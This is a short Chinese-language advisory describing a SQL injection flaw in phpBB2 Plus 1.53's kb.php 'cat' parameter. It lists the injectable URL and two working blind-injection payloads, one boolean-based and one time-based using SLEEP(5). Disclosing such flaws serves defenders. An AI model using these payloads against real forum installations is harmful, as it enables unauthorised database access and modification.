漏洞来源:
漏洞分析:
phpBB2 Plus SQL注入漏洞,因未在SQL查询中过滤用户提供的数据。攻击者可能利用此漏洞破坏网站数据库,访问或修改数据,或者近一步利用底层数据库中的潜在漏洞。
影响版本:
phpBB2 Plus 1.53和其他版本
注入链接:
http://www.example.com/kb.php?mode=cat&cat=0
注入类型:
Type: boolean-based blind – OR boolean-based blind – WHERE or HAVING clause (MySQL comment)
Payload: mode=cat&cat=-3951 OR 7858=7858#
Type: AND/OR time-based blind – MySQL >= 5.0.12 OR time-based blind
Payload: mode=cat&cat=-1 OR SLEEP(5)